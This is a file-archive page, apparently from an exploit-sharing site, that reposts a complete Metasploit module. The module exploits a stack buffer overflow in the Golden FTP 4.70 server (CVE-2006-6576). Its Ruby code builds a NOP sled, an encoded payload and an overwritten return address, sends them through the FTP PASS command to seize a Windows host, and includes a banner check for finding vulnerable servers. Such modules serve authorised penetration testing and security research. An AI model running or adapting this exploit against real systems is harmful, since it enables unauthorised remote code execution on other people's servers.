GoldenFTP PASS Stack Buffer Overflow

GoldenFTP PASS Stack Buffer Overflow: Posted Jun 3, 2011; Authored by bannedit | Site metasploit.com; This Metasploit module exploits a vulnerability in the Golden FTP service. This Metasploit module uses the PASS command to trigger the overflow.; tags | exploit, overflow; advisories | CVE-2006-6576, OSVDB-35951; SHA-256 | 6ba50b9d749a73eb361bcea253eb0bf927451c37d0d2ba653f58227c262ae8db; Download | Favorite | View

GoldenFTP PASS Stack Buffer Overflow

#
# $Id: goldenftp_pass_bof.rb 12816 2011-06-02 12:24:25Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GoldenFTP PASS Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in the Golden
        FTP service. This module uses the PASS command to trigger the overflow.
      },
      'Author'         => [ 'bannedit' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 12816 $',
      'References'     =>
        [
          [ 'CVE', '2006-6576'],
          [ 'OSVDB', '35951'],
          [ 'BID', '45957 '],
          [ 'URL', 'http://www.exploit-db.com/exploits/16036/'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 350,
          'BadChars' => "\x00\x0a\x0d",
        },
      'Platform'       => ['win'],
      'Targets'        =>
        [
          [
            'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011
            {
              'Platform' => 'win',
              'Ret'      => 0x00a93ca6,
            },
          ]

        ],
      'DisclosureDate' => 'Jan 23 2011'))
  end
  
  def check
    connect
    disconnect
    print_status("FTP Banner: #{banner}".strip)
    if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    if datastore['RHOST'].length < 15
      pad = make_nops(1) * (15 - datastore['RHOST'].length)
    end
    
    sploit = make_nops(4) * 38
    sploit << payload.encoded
    sploit << pad
    sploit << make_nops(1) * (528 - sploit.length)
    sploit << [target.ret].pack('V')

    print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")
    begin
      connect
      send_user("anonymous")
      send_cmd(['PASS', sploit], false)
      handler
    rescue EOFError
    end
  end
end

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 157 files
Jay Turla 150 files
Ubuntu 68 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

GoldenFTP PASS Stack Buffer Overflow

GoldenFTP PASS Stack Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

GoldenFTP PASS Stack Buffer Overflow

Share This

GoldenFTP PASS Stack Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems